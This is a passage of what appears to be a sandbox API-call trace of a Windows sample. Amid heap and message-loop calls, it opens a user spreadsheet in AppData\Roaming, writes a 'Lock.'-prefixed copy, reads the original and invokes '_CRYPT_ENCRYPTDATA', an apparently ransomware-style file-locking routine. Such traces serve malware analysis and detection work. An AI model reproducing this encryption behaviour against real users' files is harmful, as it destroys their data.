HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0224.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0224.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0224.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0224.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0224.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0224.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0224.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0224.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0224.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0224.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0224.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0224.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0224.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0224.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0224.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0224.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0224.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0224.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0224.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0224.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0224.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0224.456] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/bbPMuZmaU.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\bbpmuzmau.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0224.457] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0224.457] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0224.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0224.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0224.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0224.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0224.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0224.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0224.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0224.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0224.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0224.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0224.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0224.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0224.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0224.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0224.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0224.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0224.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0224.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0224.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0224.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0224.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0224.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0224.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0224.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0224.458] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0224.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0224.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0224.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0224.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0224.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0224.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0224.460] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.bbPMuZmaU.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.bbpmuzmau.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0224.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0224.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0224.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0224.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0224.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0224.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0224.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0224.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0224.461] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0224.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0224.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0224.461] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0224.461] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0224.461] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0224.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0224.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0224.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0224.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0224.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0224.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0224.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0224.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0224.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0224.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0224.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0224.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0224.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0224.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe54020 [0224.462] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0224.462] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0225.003] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x4995, lpOverlapped=0x0) returned 1 [0225.003] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0225.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0225.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0225.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0225.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0225.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14995) returned 0x2f14818 [0225.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe54020 | out: hHeap=0x970000) returned 1 [0225.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0225.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0225.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0225.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0225.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0225.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0225.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0225.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0225.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14995) returned 0x2f291b8 [0225.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0225.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0225.007] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0225.007] TranslateMessage (lpMsg=0x8cf708) returned 0 [0225.007] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0225.007] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0225.007] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0225.007] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0225.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0225.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0225.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0225.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14995) returned 0x2f14818 [0225.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0225.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0225.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0225.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0225.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0225.008] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0225.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0225.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0225.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0225.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0225.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0225.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0225.008] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0225.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0225.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0225.008] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0225.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0225.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0225.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0225.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0225.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0225.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0225.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0225.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14995) returned 0x2f14818 [0225.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0225.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0225.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0225.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0225.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fc8 [0225.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0225.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0225.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0225.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550f8 [0225.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0225.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0225.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0225.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0225.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0225.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0225.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0225.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0225.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14995) returned 0x2e80330 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0225.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0225.018] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0225.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0225.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0225.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0225.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0225.019] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0225.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0225.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0225.019] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0225.019] RtlAllocateHeap (HeapHandle=0x970000, 